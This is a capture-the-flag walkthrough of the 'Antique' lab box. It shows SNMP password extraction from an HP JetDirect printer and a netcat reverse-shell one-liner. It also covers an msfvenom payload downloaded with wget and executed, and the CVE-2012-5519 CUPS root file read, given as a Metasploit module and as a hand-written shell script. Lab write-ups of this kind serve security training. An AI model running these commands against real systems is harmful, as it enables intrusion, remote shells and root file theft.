# Antique

## Nmap

```
sudo nmap 10.10.11.107 -p- -sS -sV

PORT   STATE SERVICE VERSION
23/tcp open  telnet?
```

Since the TCP scan returns only telnet, we also run a fast UDP scan (`-F`, the top 100 ports) to look for anything else listening.

```
sudo nmap 10.10.11.107 -sU -F                     

PORT    STATE SERVICE
161/udp open  snmp
```

Connecting to telnet on port 23, the banner identifies the device as an HP JetDirect printer.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fu9mKKX5PU3fuf8poD4Qd%2Fimage.png?alt=media\&token=28830114-12fb-4a7e-a2ee-14813ef951c2)

A few default passwords prove unsuccessful. Researching on Google for JetDirect exploits we find a great article from IronGeek: <http://www.irongeek.com/i.php?page=security/networkprinterhacking>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FStkxF2ttxlJqOc5mwe1v%2Fimage.png?alt=media\&token=df22593a-7e3e-4aa5-af55-0ed2abd50ddc)

As per the article, JetDirect exposes its admin password over SNMP: a `snmpget` against HP's private-enterprise OID with the default `public` community string returns it (replace `<IP>` with the target, here 10.10.11.107).

```bash
snmpget -v 1 -c public <IP> .1.3.6.1.4.1.11.2.3.9.1.1.13.0
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9d1UDx6tM4l6TMy9hq7f%2Fimage.png?alt=media\&token=b4306874-6c71-4411-bc16-dd89115f2b6f)

`snmpget` reports the value with type `BITS` and prints the raw bytes as hex pairs. Pasting those into CyberChef and decoding from Hex gives the plaintext; the password is the printable prefix, and the bytes that follow it are not part of it.

**CyberChef:** <https://gchq.github.io/CyberChef>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FKNiI5RPsRBE7JxwVD1d9%2Fimage.png?alt=media\&token=463f9452-e015-4f6c-8ad7-cdb4badbf183)

We now have the password `P@ssw0rd@123!!123`, which authenticates the `telnet` session.
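The CyberChef step can also be done without leaving the shell. The following is an added example and not part of the original writeup: it takes the line that `snmpget` prints, hex-decodes the `BITS` bytes and stops at the first non-printable byte, because the device appends further bytes after the password. `SAMPLE` is a constructed `snmpget` line carrying the password from this box plus two trailing bytes, and `decode_jetdirect_bits` is a helper name chosen here.

```shell
#!/bin/sh
# Added example (not from the original writeup): decode the BITS value that
# snmpget returns for the JetDirect password OID, in plain POSIX sh.
# SAMPLE is a constructed snmpget line; a real device appends more bytes after
# the password, which is why decoding stops at the first non-printable byte.
SAMPLE='iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 01 15 '

# decode_jetdirect_bits <snmpget output line>
# Prints the printable prefix of the hex-encoded value, i.e. the admin password.
decode_jetdirect_bits() {
    hex=$(printf '%s\n' "$1" | sed 's/.*BITS: *//')   # keep only the hex pairs
    out=''
    for h in $hex; do
        v=$((0x$h))                                    # hex pair -> integer
        if [ "$v" -lt 32 ] || [ "$v" -gt 126 ]; then
            break                                      # first non-printable ends the password
        fi
        # integer -> octal escape -> character, appended to the result
        out="$out$(printf "\\$(printf '%o' "$v")")"
    done
    printf '%s\n' "$out"
}

# Against the live target, feed snmpget's output straight in:
#   decode_jetdirect_bits "$(snmpget -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0)"
decode_jetdirect_bits "$SAMPLE"
```

Stopping at the first byte outside the printable ASCII range is what makes this robust against the trailing data; if a password legitimately contained non-ASCII bytes the cut-off would have to be chosen differently.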

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9O07HzrvFmQREYjnh1ii%2Fimage.png?alt=media\&token=49654e36-7e7c-4beb-ac6b-96a9e41dfd14)

From the `?` output above we see the `exec` command can be used to perform system commands.

Running the following command shows `nc` is installed on the target system.

```
exec which nc
```

A `nc` listener is started on the attacking system and the following command is run in the target `telnet` session to receive a reverse shell (replace `<IP>` and `<Port>` with the listener's address and port).

```bash
exec rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <IP> <Port> >/tmp/f
```

A shell then arrives on the `nc` listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FL5BN5zmbvvrybcm2z5Qw%2Fimage.png?alt=media\&token=0a49b7c3-f3a3-4fba-bff6-6959511453ec)

After grabbing the user flag, we perform some basic enumeration against the target system. Looking through the CUPS configuration files we notice the target is running CUPS 1.6.1.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FWfRl30V52bV33zfEmkJA%2Fimage.png?alt=media\&token=fec89006-7779-405e-baa6-b88fc062ad6b)

Searching for this version shows that CUPS up to 1.6.1 lets a member of the `lpadmin` group read arbitrary files as root (CVE-2012-5519): `cupsctl` can repoint the `ErrorLog` directive, and the web interface's error log page then returns the contents of that file, which `cupsd` opens as root. Metasploit packages this as a post module, so the shell user must be in `lpadmin` for it to work.

**URL:** <https://www.rapid7.com/db/modules/post/multi/escalate/cups_root_file_read/>

As this is a `metasploit` post module it needs a Metasploit session on the target, so we get a command shell into `msfconsole` and upgrade it to `meterpreter`.

Firstly, an x86 `elf` payload was generated.

```bash
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f elf -o reverse.elf
```

A `multi/handler` listener was then set up with the same payload that `msfvenom` generated (the handler's payload must match the generated one).

```bash
msfconsole -q -x "use multi/handler; set payload linux/x86/shell_reverse_tcp; set lhost <IP>; set lport <PORT>; exploit"
```

The payload was then downloaded onto the target system and executed. The attacking machine has to serve the file over HTTP first (for example `python3 -m http.server 80` in the directory containing `reverse.elf`).

```
# Work from a directory the current user can write to
cd /tmp

# Download the payload from the attacking machine's web server
wget http://<IP>/reverse.elf

# Set executable on the payload
chmod +x reverse.elf

# Execute
./reverse.elf
```

The handler then catches a command shell session within `msfconsole`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FrpreBAWVPmawNfazThy6%2Fimage.png?alt=media\&token=bf874a0f-40f5-4b94-ac9f-785da60ca52b)

After this the following `metasploit` module was used to upgrade the command shell to a `meterpreter` session (`sessions -l` shows the session ID to pass in).

```
use post/multi/manage/shell_to_meterpreter
set SESSION 1      # the command shell session caught by the handler
run
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FbZoykivE0HNfJPMDfKhP%2Fimage.png?alt=media\&token=173d468b-8325-44f9-8bbe-6f9fee96adae)

The CUPS root file read module was then run against the new `meterpreter` session.

```
use post/multi/escalate/cups_root_file_read
set SESSION 2      # the meterpreter session created by the upgrade
set FILE /root/root.txt
run
```

`/root/root.txt` was set as the `FILE` option and the module was run, successfully reading the `root.txt` flag.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FVVYyLkk15VblGR6O1rmT%2Fimage.png?alt=media\&token=033a5c95-db75-4714-b7e2-c7e0c320d791)
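The same read can be done by hand from the `nc` shell, without Metasploit, using the mechanism the module relies on. The following is an added example and not code from the original writeup or from the Metasploit module: `has_lpadmin_group` checks the precondition the module needs, and `cups_root_read` repoints `ErrorLog` with `cupsctl`, fetches the error log page from the CUPS web interface and restores the log path. It assumes the shell user is in `lpadmin` and that the CUPS web interface listens on `localhost:631` (the CUPS default); neither is stated on the page, and the restored path is the CUPS default, so check the existing `ErrorLog` value in the CUPS configuration first.

```shell
#!/bin/sh
# Added example, not code from the original writeup or from Metasploit: the
# root file read done by hand, mirroring what post/multi/escalate/
# cups_root_file_read does on the target. Assumptions not stated on the page:
# the shell user is in the lpadmin group (required for cupsctl to accept the
# change) and the CUPS web interface listens on localhost:631 (the default).

# has_lpadmin_group [id output]: succeed if the groups list names lpadmin.
# Takes an `id` line as an optional argument so it can be checked against
# saved output; with no argument it runs `id` itself.
has_lpadmin_group() {
    case "${1:-$(id)}" in
        *'(lpadmin)'*) return 0 ;;
        *) return 1 ;;
    esac
}

# cups_root_read <path>: point ErrorLog at <path>, fetch it through the admin
# web interface (cupsd opens the file as root), then restore the log path.
# cupsd also appends its own log lines to whatever ErrorLog points at, so do
# not aim this at a file that must stay unmodified, and restore promptly.
cups_root_read() {
    target="$1"
    if ! has_lpadmin_group; then
        echo 'current user is not in lpadmin: cupsctl would be refused' >&2
        return 1
    fi
    cupsctl ErrorLog="$target"
    curl -s http://localhost:631/admin/log/error_log
    # /var/log/cups/error_log is the CUPS default; confirm the original value
    # in the CUPS configuration before relying on this restore.
    cupsctl ErrorLog=/var/log/cups/error_log
}

# Run only when a path is given, e.g.: sh cups_read.sh /root/root.txt
if [ -n "${1:-}" ]; then
    cups_root_read "$1"
fi
```

Running `id` first is worth the second it takes: on a user outside `lpadmin` the `cupsctl` call fails and nothing is read, which is the same condition the Metasploit module checks before it runs.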
